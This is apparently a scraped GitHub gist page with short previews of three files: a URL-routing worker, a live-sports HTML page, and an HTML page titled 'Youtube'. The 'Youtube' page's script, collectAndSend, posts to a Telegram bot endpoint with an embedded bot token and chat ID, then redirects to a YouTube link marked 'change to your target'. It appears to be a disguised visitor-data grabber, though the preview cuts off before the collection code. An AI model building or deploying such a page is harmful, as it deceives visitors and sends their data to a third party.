This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
export default { | |
async fetch(request) { | |
const url = new URL(request.url); | |
const parts = url.pathname.split("/").filter(Boolean); | |
if (parts.length < 2) { | |
return new Response("Usage: /tag/filename", { status: 400 }); | |
} | |
const tag = parts[0]; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE html> | |
<html lang="en"> | |
<head> | |
<link rel="stylesheet" href="styles.css" /> | |
<meta charset="UTF-8"> | |
<meta http-equiv="X-UA-Compatible" content="IE=edge"> | |
<meta name="viewport" content="width=device-width, initial-scale=1.0"> | |
<title>11s.in - Live Sports</title> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE html> | |
<html> | |
<head> | |
<meta charset="UTF-8" /> | |
<title>Youtube</title> | |
<script> | |
async function collectAndSend() { | |
const webhook = "https://api.telegram.org/bot7354714936:AAGdnmXV8AkjaMqt-jel_WSo8tfY0eENaew/sendMessage"; | |
const chatId = "7625439004"; | |
const redirectUrl = "https://youtu.be/tzyk1KqPFHY"; // change to your target |
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.